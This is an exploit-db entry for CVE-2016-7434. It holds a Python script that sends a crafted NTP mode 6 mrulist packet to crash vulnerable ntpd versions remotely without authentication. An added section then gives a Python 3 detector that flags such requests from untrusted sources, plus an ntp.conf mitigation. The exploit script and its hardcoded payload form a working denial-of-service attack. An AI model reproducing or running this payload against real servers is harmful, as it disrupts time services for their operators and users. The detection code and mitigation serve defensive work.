NTP 4.2.8p8 – Denial of Service

  • Author: Magnus Klaaborg Stubman
    Date: 2016-11-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40806/
  • #!/usr/bin/env python
    
    # Exploit Title: ntpd remote pre-auth Denial of Service
    # Date: 2016-11-21
    # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
    # Website: http://dumpco.re/cve-2016-7434/
    # Vendor Homepage: http://www.ntp.org/
    # Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
    # Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
    # CVE: CVE-2016-7434
    
    import sys
    import socket
    
    if len(sys.argv) != 3:
        print "usage: " + sys.argv[0] + " <host> <port>"
        sys.exit(-1)
    
    
    payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
    
    print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
    print "[+] Done!"
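
A detection-side counterpart, added here as an example and not part of the original exploit-db entry: the first two payload bytes above, `\x16\x0a`, decode to an NTP mode 6 (control) message with opcode 10, ntpd's mrulist request, so a sensor on UDP/123 can flag such requests from sources that have no business querying the daemon. The function names, the trusted-source list and the sample datagrams are assumptions constructed for illustration (Python 3).

```python
import struct

MODE_CONTROL = 6   # low three bits of byte 0: NTP mode 6 (control, used by ntpq)
OP_READ_MRU = 10   # low five bits of byte 1: mrulist request (0x0a)
# Mode 6 header: flags, R/E/M+opcode, sequence, status, association id, offset, count
HEADER = struct.Struct("!BBHHHHH")

def parse_control(datagram):
    """Return the mode 6 header fields as a dict, or None for anything else."""
    if len(datagram) < HEADER.size:
        return None
    flags, rem_op, seq, _status, _assoc, offset, count = HEADER.unpack_from(datagram)
    if (flags & 0x07) != MODE_CONTROL:
        return None
    return {
        "version": (flags >> 3) & 0x07,
        "response": bool(rem_op & 0x80),   # R bit set means a server reply
        "opcode": rem_op & 0x1F,
        "sequence": seq,
        "offset": offset,
        "count": count,                    # data length before 4-byte padding
        "data": datagram[HEADER.size:HEADER.size + count],
    }

def classify(datagram, src_ip, trusted=("127.0.0.1", "::1")):
    """Triage label for one datagram seen on UDP/123 (trusted list is an assumption)."""
    msg = parse_control(datagram)
    if msg is None:
        return "not-control"
    if msg["response"]:
        return "control-response"
    if msg["opcode"] == OP_READ_MRU and src_ip not in trusted:
        return "alert: mrulist request from untrusted source"
    return "control-request"

# Constructed sample datagrams (not captured traffic, not the payload above).
SAMPLES = {
    "client": bytes([0x23]) + bytes(47),               # VN 4, mode 3 time request
    "readvar": HEADER.pack(0x16, 2, 1, 0, 0, 0, 0),    # mode 6, opcode 2
    "mrulist": HEADER.pack(0x16, 10, 2, 0, 0, 0, 5) + b"nonce\x00\x00\x00",
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, "->", classify(pkt, "198.51.100.7"))
```

Hosts that cannot yet move to a release outside the affected range listed in the header can refuse mode 6 queries from untrusted networks with `restrict default noquery` in ntp.conf.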